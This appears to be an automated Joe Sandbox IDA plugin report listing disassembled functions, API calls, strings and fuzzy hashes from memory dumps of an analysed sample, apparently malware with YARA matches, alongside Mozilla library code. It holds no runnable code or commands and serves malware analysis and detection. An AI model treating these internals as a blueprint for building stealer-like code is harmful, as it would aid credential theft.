Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 065394f742d2df83397bf12a8cad2ae77dfb0efb2915d07e0dc89aec524db806
Instruction ID: 728646122c1ceb96c7e31d3e7cc7463d30dcce4e5c7547f40bd2e00bf7aeff89
Opcode Fuzzy Hash: 065394f742d2df83397bf12a8cad2ae77dfb0efb2915d07e0dc89aec524db806
Instruction Fuzzy Hash: 50E01278482240DBEF105F25EA48B313BEEFB02245F40006AEA9083280DBBAC080DA20

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87204), ref: 6BBB0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6BBB00A7
FreeLibrary.KERNEL32(?,6BB87204), ref: 6BBB00BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6BBB00A1
wintrust.dll, xrefs: 6BBB0083

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 1de499de8a8f9b0ba4b74539fbf0a8204c78cff223cf5b150eda724aa22168bd
Instruction ID: adbb93de6d94d54d2ee5d4676f77004e1296e5499ac5d31acf64fd3a546a5978
Opcode Fuzzy Hash: 1de499de8a8f9b0ba4b74539fbf0a8204c78cff223cf5b150eda724aa22168bd
Instruction Fuzzy Hash: 4CE09279445349DFEF10AF66EA187357BEEA70B341F80842AA914C3350DBBAC404DB21

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB87235), ref: 6BBB00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6BBB00F7
FreeLibrary.KERNEL32(?,6BB87235), ref: 6BBB010E

Strings

wintrust.dll, xrefs: 6BBB00D3
CryptCATAdminCalcHashFromFileHandle2, xrefs: 6BBB00F1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 0a85e096a5d3d9c2e1b77a941f66c6ab10d5ea1d9482a56ece2ffcd6000fbb5f
Instruction ID: 3a1bba42be9c368146dc789880ad2d96654524638fcd00c02f0bcb54012677d0
Opcode Fuzzy Hash: 0a85e096a5d3d9c2e1b77a941f66c6ab10d5ea1d9482a56ece2ffcd6000fbb5f
Instruction Fuzzy Hash: 4DE0B678446345DFEF209F65EA4A7317BEEE707B41F848429A94983640EBBAC444CB20

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6BB805BC), ref: 6BBDBAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6BBDBAD7
FreeLibrary.KERNEL32(?,6BB805BC), ref: 6BBDBAEC

Strings

kernelbase.dll, xrefs: 6BBDBAB3
VirtualAlloc2, xrefs: 6BBDBAD1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: fe27fb36355316bf6e2a594476a4438e158cc2b6e47d43ffbfc95cc1e0d72275
Instruction ID: d6a7417c1dfef30bbf3166c7cc58dde7cee985f28e88ad55e8b11526dbafe2e3
Opcode Fuzzy Hash: fe27fb36355316bf6e2a594476a4438e158cc2b6e47d43ffbfc95cc1e0d72275
Instruction Fuzzy Hash: 6DE09274402382DBDB109F62E958B257BEDE706324F18542AA90483200FBBAC009CA24

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB877C5), ref: 6BBDC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6BBDC2B7
FreeLibrary.KERNEL32(?,6BB877C5), ref: 6BBDC2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6BBDC2B1
wintrust.dll, xrefs: 6BBDC293

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: 4c0e755d248b2e29c90eb6dae79000971a875bb23f6e86e8b3e102286c9297e5
Instruction ID: 354f83c8812dff16155c081aef61dbd452f1b8b2a11cf1c879cbffd7dfaf11c4
Opcode Fuzzy Hash: 4c0e755d248b2e29c90eb6dae79000971a875bb23f6e86e8b3e102286c9297e5
Instruction Fuzzy Hash: C5E0B678442346EFEF106F69E908722BFEDEB06304F440629A90883710E7BBC408CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BB877F6), ref: 6BBDC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6BBDC267
FreeLibrary.KERNEL32(?,6BB877F6), ref: 6BBDC27C

Strings

CryptCATAdminAcquireContext, xrefs: 6BBDC261
wintrust.dll, xrefs: 6BBDC243

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 5940008e3ed9469a2c5e6390a160fe3c9738998c1d3d100c514535e969b60e2f
Instruction ID: ba4b52221093aea5775b582137d7a11e1b6b57d0f7aeacbec393dd63d5bac016
Opcode Fuzzy Hash: 5940008e3ed9469a2c5e6390a160fe3c9738998c1d3d100c514535e969b60e2f
Instruction Fuzzy Hash: 96E0B678451341DBEF186F66E9087257EEDEB0B344F10446AE904C3210E7BAC444DF68

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6BBDC1DE,?,00000000,?,00000000,?,6BB8779F), ref: 6BBDC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6BBDC217
FreeLibrary.KERNEL32(?,6BBDC1DE,?,00000000,?,00000000,?,6BB8779F), ref: 6BBDC22C

Strings

WinVerifyTrust, xrefs: 6BBDC211
wintrust.dll, xrefs: 6BBDC1F3

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 91dffc99f489cd791310a417f3d68a3ba36917e83e574f8daa7ec10b9b5728fd
Instruction ID: 4b02c2f4282d2d9298c28ded96315f2e3584bb62478d336bc9e2aa550d5e93f7
Opcode Fuzzy Hash: 91dffc99f489cd791310a417f3d68a3ba36917e83e574f8daa7ec10b9b5728fd
Instruction Fuzzy Hash: A4E0B678442781DBEF106F65E90872A7EEDAB06344F000529E904C3711E7BBC404CB70

Uniqueness

Uniqueness Score: -1.00%

Function 6BB860E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB860F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB86180
free.MOZGLUE(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB86211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6BB86229
free.MOZGLUE(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB8625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6BB85FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BB86271

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: aa7845c05984dbd70b72cc727cc13445a190aef3e21a7522cc50fb4360020508
Instruction ID: ab6ed0ba928b6fe129e146b624bd4fc79e07fd1a7ca00c1aec19adb9fab3fff4
Opcode Fuzzy Hash: aa7845c05984dbd70b72cc727cc13445a190aef3e21a7522cc50fb4360020508
Instruction Fuzzy Hash: 335199B1A102468FEB14DFA8D881BAEB7B5EF45308F100479CA17DB312E739EA55CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040F200 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F228
strtok_s.MSVCRT ref: 0040F36D

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
Instruction ID: 34556820f6e5338ba8e8a845a83fb71131f6fb13afd6d5a2f2d9a2f2ab0dc7f0
Opcode Fuzzy Hash: 89292260d13e06a3ccf44185258d8082ce40877a689944c47bb1047c3bb279de
Instruction Fuzzy Hash: 4F514FB5A04209DFCB18CF54D595AAE7BB6FF48308F10817DE802AB390D734EA95CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004097F0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0040980B
memset.MSVCRT ref: 0040983E
LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,042EEF50,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

v10, xrefs: 00409802
@, xrefs: 00409847

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
String ID: @$v10
API String ID: 1400469952-24753345
Opcode ID: 0bf8727121b417ca883b6e0e4ab51307295e45311a19dd4b82701fff5f4c4078
Instruction ID: 87859f0eaa1cac66c0422607c8296a2f5b7cfd88fdb957a476e5adb471fb7cf1
Opcode Fuzzy Hash: 0bf8727121b417ca883b6e0e4ab51307295e45311a19dd4b82701fff5f4c4078
Instruction Fuzzy Hash: 00414EB0A00208EBDB04DFA5DC55FDE7B75BF44304F108119F909AB295DB78AE85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBD210 Relevance: 7.6, APIs: 5, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6BB85820,?), ref: 6BBBD21F
moz_xmalloc.MOZGLUE(00000001,?,?,6BB85820,?), ref: 6BBBD22E

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6BB85820,?), ref: 6BBBD242
free.MOZGLUE(00000000,?,?,?,?,?,?,6BB85820,?), ref: 6BBBD253

Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6BB85820,?), ref: 6BBBD280

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID:
API String ID: 2029485308-0
Opcode ID: 6b4772be22ae0bc0704e3a4ab8ef81dfdc26c1682f3f91fe08cc8d35356411c8
Instruction ID: 99ce673a4d60203c559c576884ef8e5461943e220bddb03da898c92b8b7ced85
Opcode Fuzzy Hash: 6b4772be22ae0bc0704e3a4ab8ef81dfdc26c1682f3f91fe08cc8d35356411c8
Instruction Fuzzy Hash: B331E5B59406D59BCB00CF68D881A7EBBB5FF89744F244169D9146B301D77AE802CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BB8C150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6BB8C1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6BB8C1DC

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: a113087e8b4532a44b7abd8ddb94829e55d2b7952a745266a514d1b8cd7724ba
Instruction ID: 6465dd6745fd77d1eb23068b8e2b95bb3012fc2cb401514e25554bf5a1248c64
Opcode Fuzzy Hash: a113087e8b4532a44b7abd8ddb94829e55d2b7952a745266a514d1b8cd7724ba
Instruction Fuzzy Hash: 3F41E4B1D08780CFD710CF28D48175AB7E4FF8A704F408A6DE8889B252E734D948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB74310 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000010,?,6BB742D2), ref: 6BB7436A

Part of subcall function 6BB8CA10: malloc.MOZGLUE(?), ref: 6BB8CA26

memcpy.VCRUNTIME140(00000023,?,?,?,?,6BB742D2), ref: 6BB74387
moz_xmalloc.MOZGLUE(80000023,?,6BB742D2), ref: 6BB743B7
free.MOZGLUE(00000000,?,6BB742D2), ref: 6BB743EF
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6BB742D2), ref: 6BB74406

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemallocmemcpy
String ID:
API String ID: 2563754823-0
Opcode ID: be525bfebe424e9f5e0214517eb57e73e870913091e43ac25976f586ceb21d3f
Instruction ID: 64d3ce97a3af17598085a7d5465684818f6515da666ad4be39e4a745fdab7a1e
Opcode Fuzzy Hash: be525bfebe424e9f5e0214517eb57e73e870913091e43ac25976f586ceb21d3f
Instruction Fuzzy Hash: 1D31F772A001958FD724EE789C9056EB7B6EB41365B110B79E83ADB3C4EB34E9008392

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD0B90 Relevance: 7.6, APIs: 5, Instructions: 92timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BBC

Part of subcall function 6BB95C50: GetTickCount64.KERNEL32 ref: 6BB95D40
Part of subcall function 6BB95C50: EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BB95D67

?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BCA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BD5

Part of subcall function 6BB95C50: __aulldiv.LIBCMT ref: 6BB95DB4
Part of subcall function 6BB95C50: LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BB95DED

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBD0BE2
?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBD0C9A

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: b4d22f5191660b891f330e39f00fb22886de2fcab5316ffa9df4a1382a117062
Instruction ID: 96bb08911a944f5eff902528011a0f99c05e2684cf7607f5697a02586be11be9
Opcode Fuzzy Hash: b4d22f5191660b891f330e39f00fb22886de2fcab5316ffa9df4a1382a117062
Instruction Fuzzy Hash: 2D31F571D187548BC714DF38989011BB7E8EFC27A0F504B1EF8A5A72D0EBB8D8458B92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB86390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BB863D0
AcquireSRWLockExclusive.KERNEL32 ref: 6BB863DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6BB8640E
__Init_thread_footer.LIBCMT ref: 6BB86467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BB864A8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: f84440b7a4475e84304c61b5439fe13bd117a1abb66f7f9f15c7e2eb81a29fd0
Instruction ID: 46df9f09354bfa45d23eb174682a86f4bb6cf5303a3b0567c8d5d97acdac73cc
Opcode Fuzzy Hash: f84440b7a4475e84304c61b5439fe13bd117a1abb66f7f9f15c7e2eb81a29fd0
Instruction Fuzzy Hash: 99317CB0809285CFDB00DF68E09566EBBF9FB8A354F15441DD89A83340D739D489CB63

Uniqueness

Uniqueness Score: -1.00%

Function 004135E0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(0041D8AC,?,?,004137D1,00000000,?,042EEF50,?,0041D8AC,?,00000000,?), ref: 0041362C
sscanf.NTDLL ref: 00413659
SystemTimeToFileTime.KERNEL32(0041D8AC,00000000,?,?,?,?,?,?,?,?,?,?,?,042EEF50,?,0041D8AC), ref: 00413672
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,042EEF50,?,0041D8AC), ref: 00413680
ExitProcess.KERNEL32 ref: 0041369A

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
Instruction ID: a268315634fda69ed0a537ef202e87298384d27024bdd5aae2ec85167a5c17e0
Opcode Fuzzy Hash: 1317ddf1f9c1afdd93909f223843f69075992d328c88535c6b58c76ddc48183c
Instruction Fuzzy Hash: 6421BA75D14209ABCB14EFE4D945AEEB7BABF4C305F04852EE50AE3250EB345644CB68

Uniqueness

